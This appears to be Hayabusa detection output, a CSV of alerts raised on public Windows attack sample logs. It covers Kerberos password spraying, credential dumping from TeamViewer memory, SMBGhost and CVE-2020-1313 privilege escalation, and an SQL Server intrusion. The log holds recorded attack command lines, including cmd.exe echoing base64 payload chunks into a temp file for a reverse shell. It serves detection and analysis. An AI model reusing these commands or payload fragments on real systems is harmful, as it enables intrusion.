-,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: HD02 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.414 
+09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: svc-01 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: bob | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: admin02 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.434 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: normal | Svc: krbtgt | IP Addr: 172.16.66.1 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.437 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: normal | Svc: krbtgt | IP Addr: ::ffff:172.16.66.1 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-25 02:20:29.872 +09:00,LAPTOP-JU4M3I0E,10,high,,Process Access_Sysmon Alert,Credential Access - TeamViewer MemAccess | Src Process: C:\Users\bouss\AppData\Local\Temp\frida-b4f3ceb41e16327436594aec059ee5d5\frida-winjector-helper-32.exe | 
Tgt Process: C:\Program Files (x86)\TeamViewer\TeamViewer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x147a | Src PID: 18192 | Src PGUID: 00247C92-185D-5F1B-0000-0010667A1211 | Tgt PID: 2960 | Tgt PGUID: 00247C92-1562-5F1B-0000-0010318FFE10,rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_teamviewer-dumper_sysmon_10.evtx +2020-07-27 07:26:14.522 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7400 | Src PGUID: 747F3D96-FF9D-5F1D-0000-00100AC62400 | Tgt PID: 584 | Tgt PGUID: 747F3D96-F938-5F1D-0000-00104B500000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3660 | PGUID: 747F3D96-0306-5F1E-0000-0010E15F3100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49796 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 7400 | PGUID: 
747F3D96-FF9D-5F1D-0000-00100AC62400,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49796 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-F935-5F1D-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-07-30 23:06:52.015 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\cmdLine: c:\windows\system32\cmd.exe | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx +2020-07-30 23:06:52.015 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,"PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\startArg: /c ""whoami > c:\x.txt & whoami /priv >>c:\x.txt"" | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 
00247C92-19D5-5F14-0000-001019F52000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx +2020-07-30 23:06:52.015 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,"PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\pauseArg: /c ""whoami > c:\x.txt & whoami /priv >>c:\x.txt"" | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx +2020-07-30 23:06:52.015 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\queuedTime: QWORD (0x01d6667a-0xac806dc2) | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx +2020-08-02 07:58:09.443 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x414 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 
+2020-08-02 07:58:09.721 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x8f4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 
+2020-08-02 07:58:09.995 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x106c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 
+2020-08-02 07:58:10.269 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFWL7IHsEQQA5bjUAuwAH1ajfhfFABqpn0EAo0RAQQCjBBgDADMKxUhPjgBXjUUM5iGOc6pRx+HwF0EARNJABJUdQDxBUG7WTAAAaOBfQADo2KQAAIPEBFNTU2hMQKcA6Ds+ANSLVQyGIgiLYEx+QQBSUI1V9FFS6GRKAACLVfSNRfyNTftQUWgU0kABUujeSgA3hcAPhZoEPEqLNWj6QKoPvkX7g8Bag/g5D4dmBAAAM7iKiAgXQAD/JLaYFkAAi1X8UsAVbMFAs4PEBDvDoxBUnnAPsT0E0C1o+M9AE+htLAAA6SuTAADHBdQCQQABAAAA6R8Efk+JHRRZQADpFAQrAItF/FD/FVOh2ACjGPpAq+kWMgAAi02l2v8LbMGPAKOoAkEA6enPAAA5HWACLAB+DWgc0UAAzhQLAABuxATHJmACZAD/////6USc>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xc48 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 
+2020-08-02 07:58:10.544 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AACLVfxS/xWIwUA6o7gL2wDpsQMAACYdHNDmAOmpLAAAi0X8UP8ViMFAAFgvFygA6ZIWAACJHSDQQADpGAMAANYdYGnAm3QNaLzRQABM4AUAAIPEBIv2/AirhjUABYMxGzt8dVbHBTsCQQABAAAA6SukHgA5HSA4QQAPhEoDAABQ/xVwV0DsOR1gAkEAdFBuoDNAEug2BQAYg8QEi1X8Ujc/NQAAg8QEO8N1D8fnYOBBAAIAAADpDwMqADkdAjhBAA+EAwMAAFAMFXDBfQDH+FxlQQBUAAAA6e17/gCLSfxQNxVsFkAAllgCpADp1gIAiotu/FH/FWyMQACjZBoyAD5pENBAAN7DAABPuAIAAItF/LqVrkGDudCKCIgMVkA6H3X26aIXAC2LVVuhkiNhMVNonNFAAKpokNFMAFDoXkYAAIPEFCFEQEFz6XsCAK6LjPyLDXTB4q+DOQF+ETPSqAiKF1L/Oo0Yg4PECOsSiw1DwUDTM8CKB4sRigRCg/jAO8N0BkeYffzryIPJ/zNR8v730Uka6MqgAAA9AAQAhHYNaGjRQL/oWQQAm4PEBItV/Bfq/4v6M8DyrvfRI42F9Pv//1FSUHB4oAAAU/+N9Ir//2ic0UAAkGhQ0UAa6Y4A+7WLfe+LDXTBQACRzgF+ETPSTMeKF3D/+o99/IPESOsSoA149kAA/NmKHYsRihVCgwEIrcN0BkeaffzryIP3TTPA8q73tElR6OugAJI9AFAJAHYNaDTRQADoEwMMHYOdpItS/IOe/4v6yMDyrvf8SaKF9ML///VSUOc2oE0AU42N9Pv/UGiW0UAAUWiF0YkAixUEGEEAiJwF9Pv/G6FMQEEAUlDou0QAAIPEGKMEGEFe6V0BAACLTfyLFUhAwgChTEBBAFNonDtAAFFSUBWSRAAAi022iz2MwXoApAVoENFAAFGjSEBBAP8Ag/wghcB1D8fCfDpBlIsAAADp6gAAS4tV/GoHCwjRQABS/ziDxAyFwM0PSQWEAkEAagAAyenHAAAxHkX8agto/NCOAFD/1wHEDIV7DxfWAAAAxwWAAgwAAQAAxOmghwAAx4GIQ7GFUAAAAOmRAAAAi038x6iIYkEAIioAzokN6JEqG9NHi1XKgTrqXrh8wUAAg8QIwcPgErQY/1D/FbjBJwCDxASjdAJBAIvMK7pAPJ4AK9CKygoMAnA6y3X2Ga54AkEAAQAAAOvQvkX8xwWIDkEAAQAAAFOoFEEA6yOLTfzHBYgCQQCpAAAAhIO1F0FlsQ6LVQyLAlCO/S0AAIPEFotF9I0V/I1V+1FSaBTSQABQ6ERGAACFwA+ER/v//4tF9ItNCN81gHJAAEk5SHW+1ouGDIsWyMBAACbZQIsCUNvc0EAAokvWi1XTiwJQ6GstAACLRfSDxECLSKZ8UByLFIpBiUgyoUxAYACzUOjJK7Qrs+iaLwAAg8QEhcB0U4tqPaHIwEAAZMBA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1184 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 
+2020-08-02 07:58:10.819 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x224 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:11.094 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xec4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:11.368 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
eOOLdQxWjUWIaniEVuiJaAAAi00IwBXIwEAArFGDwkBorN5AAIz2FYCuQAChrAJBAIPEFGPAdMxQaNfS3fU6FaC9zgCDxAhW/xVwwWEAXpCQRJDMkA6Q2ZC8OVWL7IPsFNRWuXUIV4tGFIlFwehJGgAAS6ALMgCJFaQLQQDM2ItGD4XAzvp1QIsNBGoAagBR6JaLAADNnjgIAACJvjwIAABcRhgAAAC8ixVUF7MAiVZzUbeQQQCFwHQ7oXACQQDNygPIiU776wKfjjgIpDOhKNAXAIsV8tA8AI/Ii4Y8CAAAE8I7+A+P5QAAAHwIO/4Ph6YAAACL3hiLHTDQQACLRgSNY3UDKFEWUOitawAAhRIqM4PBC8TRPWj9CgB0Jz3ZSQoAdLmYV/0KAKUZPST9CgB0Ej2hw5MAtwsOsyMLABWlpgAANIuoCIsdoAJBAIv6pAJBAAPcg9cviR2gAkEAiT2kIEEAi1YYi042A9boyIlWGImCtg+F7Jr1/8dGCN0AAC/oNEoAZaOgC0EAiRWkC10AkFYEibFACAAAMw2kC0FyuAEAAAAsRfBm1EX0iY5ECAAAi+trF/YcjUXsiU74UOqJzvzGH0BHAF9eW/zlXcN04NReAP8VZMFAX1boahoAAIPECMZeW4vlXcOLHbwCQQBovNRAAEOJJLwCQQAxq2TBGOhW6EIaAACDxAhfXluL5V3DkJCQkJCQkJBVi+yz7LzGAACLRZmVwHSG9YsJqwAQoAtBMokVpAtBPusLixWkC0EAoaA4QQDTix1tC0EA/leLPfcLQd8r0u7XifvYiVXQizVkwUAA34/YaLSY2gC0+kHCQADdXdC01mgvOUEZaKjfQAD/1qEAGEEAUGhGoUAA/8QzyWaLDUzdQQAvaMvfQAD/1miA1EAAw9YcFcNeQQAGJJ7fQMxv1rut0kEAUGgc30AA/9bTP9RAAP/Wiw3r3EAAlFkA388A/9aLVeKLRdBSFGjY3roA/9aLDawCQQCDxJ1RaLzFQAD/1osVuALnAFJooN4RAP/WqbjOQQCDxBCFwHQkocwCQemLDR4C7wAqFX8C4QBQocQCQQBRUlBokt5AAETWg/ROi5K8AkEAUWhI3kAAlNah0AJBAIPECIXAdHYoaCzeLgD/1oDECKEzYUEAhcB0EXQVsAKZAFJoEN5AANBKG1MIoZQCQQCLDcICQf5QUWjo3UAA/2ShYAJBiYPXDBb4AXUXixWkAkEM9KACQQBSUMLIpEAA/96DxAyDPWACQS4CdRiLaKQCQQCLFaACQQBRBmio3UAA/9aDxAyhnOKWuosNmDxBAFBRE4QUQAD/1n1F0NwdMMJAiebEDN/g9sRED4tqAAAAoewC2wCFwA+Ed6YAAN0FKMJAANx10IPsCN1dgNsFrAJBANxNgN0chGhQ3UAA/9bbBRjQQACDQQTcaNDcDSDnQADarqwCQQBCHPJoJN1AAP+c3UWV3A0g>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x274 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:11.643 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe28 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:11.917 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xf18 | User: Svc-SQL-DB01 | LID: 